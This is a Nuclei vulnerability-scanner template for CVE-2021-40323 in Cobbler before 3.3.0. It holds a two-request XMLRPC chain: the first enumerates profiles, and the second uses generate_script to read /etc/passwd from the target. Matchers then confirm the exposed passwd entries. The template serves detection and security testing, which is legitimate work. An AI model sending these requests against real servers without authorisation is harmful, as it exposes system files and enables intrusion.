nuclei-templates/cves/2021/CVE-2021-40323.yaml

100 lines
2.4 KiB
YAML

id: CVE-2021-40323
info:
name: Cobbler <3.3.0 - Remote Code Execution
author: c-sh0
severity: critical
description: Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method.
reference:
- https://github.com/cobbler/cobbler/releases/tag/v3.3.0
- https://github.com/cobbler/cobbler/issues/2795
- https://tnpitsecurity.com/blog/cobbler-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2021-40323
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-40323
cwe-id: CWE-94
tags: cve,cve2021,cobbler,rce
requests:
- raw:
- |
POST {{BaseURL}}/cobbler_api HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<?xml version='1.0'?>
<methodCall>
<methodName>find_profile</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>name</name>
<value>
<string>*</string>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
- |
POST {{BaseURL}}/cobbler_api HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<?xml version='1.0'?>
<methodCall>
<methodName>generate_script</methodName>
<params>
<param>
<value>
<string>{{profile}}</string>
</value>
</param>
<param>
<value>
<string></string>
</value>
</param>
<param>
<value>
<string>/etc/passwd</string>
</value>
</param>
</params>
</methodCall>
extractors:
- type: regex
name: profile
internal: true
group: 1
regex:
- '<value><string>(.*?)</string></value>'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- 'text/xml'
- type: regex
regex:
- "root:.*:0"
- "bin:.*:1"
- "nobody:.*:99"
condition: or
# Enhanced by mp on 2022/05/02